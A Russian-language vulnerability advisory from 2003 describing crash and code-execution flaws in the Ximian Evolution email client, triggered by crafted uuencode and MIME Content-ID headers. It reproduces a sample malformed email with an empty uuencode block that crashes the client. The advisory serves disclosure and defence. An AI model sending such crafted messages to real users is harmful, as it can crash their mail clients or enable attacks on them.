Множественные уязвимости в Ximian Evolution e-mail client software

Дата публикации:
24.03.2003
Всего просмотров:
729
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Несколько уязвимостей обнаружено в Ximian Evolution e-mail client software. Удаленный пользователь может вызвать отказ в обслуживании, обойти проверки безопасности и может выполнять произвольные команды на целевой системе.

Core Security Technologies сообщил, что удаленный пользователь может послать специально обработанный Uuencode заголовок в электронном сообщении, чтобы аварийно завершить работу клиента при попытке прочитать это сообщение.

Также сообщается, что удаленный пользователь может послать особенно обработанный MIME Content-ID заголовок как часть MIME образа, чтобы передать произвольные данные к GTKHtml для обработки. В результате работа приложения аварийно завершиться с возможностью выполнения произвольного кода.

Пример:

>From xxx@corest.com Wed Mar  5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit

begin 600
 
end
Еще несколько примеров в источнике сообщения.

Уязвимость обнаружена в Ximian Evolution Mail User Agent 1.2.2

или введите имя

CAPTCHA